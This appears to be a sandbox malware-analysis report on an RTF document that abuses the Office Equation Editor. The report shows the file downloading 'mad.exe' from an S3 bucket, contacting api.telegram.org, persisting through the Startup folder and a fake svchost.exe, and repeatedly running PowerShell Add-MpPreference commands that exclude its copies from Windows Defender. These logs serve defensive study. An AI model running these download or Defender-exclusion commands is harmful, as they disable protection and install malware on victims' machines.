                                                  SHA512:4719421697b111049062271caef40709f72e8b32b96b023af71626e5b6d209434bf0eebffdee844fe15e283fdce42ed93d311876818a123562b42c09efa14e6d
                                                  SSDEEP:24576:bs3sSY8fk9mx1nmyuWKNYEDgjfCHw/AMCTIujdqIcfQTWLgmQxKnZpqsmEuyF2w9:S
                                                  File Content Preview:{\rtf8130{\object90153381 90153381 \'' \objautlink92734161\:\objupdate1977406519774065 \objw6282\objh2274{\*\objdata692470 {{{{{{{{{{{{{{{{{{{{{{{{{{\bin000000000 {\*\objdata692470 } \printim209

                                                  File Icon

                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                  Static RTF Info

                                                  Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 000000EBh | | | | | | | | no
1 | 000000B0h | | | | | | | | no

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 20:31:09.644644976 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:09.848016024 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:09.848231077 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:09.848525047 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.051945925 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.101667881 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.101728916 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.101777077 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.101826906 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.101826906 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.101875067 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.101876974 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.101906061 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.101933002 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.101941109 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.101990938 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.101990938 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.102032900 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.102066994 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.102086067 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.102092981 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.102129936 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.102152109 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.102185011 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.105278015 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.134949923 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.135090113 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305121899 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305355072 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305522919 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305546999 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305567980 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305589914 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305599928 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305613041 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305617094 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305634022 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305640936 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305656910 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305659056 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305680990 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305681944 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305701971 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305710077 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305723906 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305731058 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305746078 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305749893 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305768013 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305771112 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305789948 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305804014 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305808067 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305824041 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305830956 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305843115 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305854082 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305866003 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305876017 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305883884 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305897951 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.305922985 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.305941105 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.306634903 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.339422941 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.339483023 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.339622974 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.507145882 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507178068 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507252932 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.507297993 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.507599115 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507623911 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507641077 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507658005 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507702112 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.507719040 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507740021 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.507744074 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507766008 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507785082 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.507788897 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507816076 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507827997 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.507848978 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507869959 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507891893 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507915974 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507922888 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.507939100 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507961035 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.507982969 CEST | 49167 | 80 | 192.168.2.22 | 52.218.240.113
May 4, 2021 20:31:10.507983923 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
May 4, 2021 20:31:10.508004904 CEST | 80 | 49167 | 52.218.240.113 | 192.168.2.22
                                                  May 4, 2021 20:31:10.508028030 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508052111 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508074999 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508100033 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.508102894 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.508116007 CEST4916780192.168.2.2252.218.240.113

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 20:31:09.510771036 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 20:31:09.571837902 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
May 4, 2021 20:31:09.572257996 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 20:31:09.630546093 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
May 4, 2021 20:33:21.528346062 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
May 4, 2021 20:33:21.577101946 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2021 20:31:09.510771036 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c09 | Standard query (0) | miolouno.s3-us-west-2.amazonaws.com | A (IP address) | IN (0x0001)
May 4, 2021 20:31:09.572257996 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c09 | Standard query (0) | miolouno.s3-us-west-2.amazonaws.com | A (IP address) | IN (0x0001)
May 4, 2021 20:33:21.528346062 CEST | 192.168.2.22 | 8.8.8.8 | 0xc6c2 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2021 20:31:09.571837902 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | miolouno.s3-us-west-2.amazonaws.com | s3-us-west-2-r-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 20:31:09.571837902 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | s3-us-west-2-r-w.amazonaws.com | | 52.218.240.113 | A (IP address) | IN (0x0001)
May 4, 2021 20:31:09.630546093 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | miolouno.s3-us-west-2.amazonaws.com | s3-us-west-2-r-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 20:31:09.630546093 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | s3-us-west-2-r-w.amazonaws.com | | 52.218.240.113 | A (IP address) | IN (0x0001)
May 4, 2021 20:33:21.577101946 CEST | 8.8.8.8 | 192.168.2.22 | 0xc6c2 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• miolouno.s3-us-west-2.amazonaws.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 52.218.240.113 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
May 4, 2021 20:31:09.848525047 CEST | 1 | OUT | GET /mad.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: miolouno.s3-us-west-2.amazonaws.com
    Connection: Keep-Alive
May 4, 2021 20:31:10.101667881 CEST | 1 | IN | HTTP/1.1 200 OK
    x-amz-id-2: DS7QrdmdJpyib1F1w8LPzDqd7RTzrfjUtXZKXhrpOuBqbV8xuHGgC7n/1gKtnvkdl880SC70WW0=
    x-amz-request-id: S238G7R11599EGD7
    Date: Tue, 04 May 2021 18:31:10 GMT
    Last-Modified: Tue, 04 May 2021 10:51:11 GMT
    ETag: "d96f52fc8733d2f4a127bdc44d4ceb25"
    x-amz-version-id: IAoppdQmXchpR2n3EPNrNxP0ggf842rd
    Accept-Ranges: bytes
    Content-Type: application/x-msdownload
    Content-Length: 3367424
    Server: AmazonS3


Code Manipulations

Statistics

Behavior

                                                  System Behavior

                                                  General

                                                  Start time:20:30:37
                                                  Start date:04/05/2021
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                  Imagebase:0x13f520000
                                                  File size:1424032 bytes
                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:38
                                                  Start date:04/05/2021
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:43
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 41%, Virustotal, Browse
                                                  • Detection: 19%, Metadefender, Browse
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:30:49
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:50
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:51
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:51
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:56
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
                                                  Imagebase:0x10b0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 41%, Virustotal, Browse
                                                  • Detection: 19%, Metadefender, Browse
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:20:30:57
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:57
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:30:58
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:20:31:00
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
                                                  Imagebase:0x10b0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:09
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:14
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Start time:20:31:13
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Start time:20:31:13
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe'
                                                  Imagebase:0xb20000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 19%, Metadefender, Browse
                                                  • Detection: 45%, ReversingLabs

                                                  General

                                                  Start time:20:31:14
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

General

Start time: 20:31:15
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Imagebase: 0x22000000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 20:31:16
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Imagebase: 0x22000000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 20:31:17
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Imagebase: 0x22000000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

Disassembly

Code Analysis
